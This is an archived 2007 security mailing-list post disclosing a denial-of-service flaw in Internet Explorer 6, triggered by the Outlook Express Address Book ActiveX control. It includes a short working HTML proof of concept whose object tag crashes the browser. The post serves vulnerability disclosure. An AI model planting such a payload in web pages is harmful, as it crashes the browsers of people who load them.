|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
no-reply
yahoo.com
Date: Wed Jun 06 2007 - 07:47:42 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
IE 6 / MS Office Outlook Express Address Book Activex DoS
Affected Software : MS Internet Explorer 6.x
Overview:
-----------------
when a browser use MS outlook Express Address book ActiveX , crash the browser immediately.
An attacker can exploit this issue to trigger denial-of-service conditions in Internet Explorer version 6(.x) .
PoC (HTML)
------------------
<!--
[~] Microsoft Office Outlook Express Address Book DoS
[~] Tested on windows XP sp2 , IE 6
[~] Simorgh Security Team / www.simorgh-ev.org
[!] Hessam-x / www.Hessamx.net
-->
<HTML>
<object classid='clsid:233A9694-667E-11d1-9DFB-006097D50408' id='outlook' /></object>
<center> Microsoft Office Outlook Express Address Book DoS</center>
<center>Hessamx</center>
</HTML>
Credit
------------------
Discovered By Hessam Salehi (Hessamx)
Simorgh Security Team / www.simorgh-ev.org
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]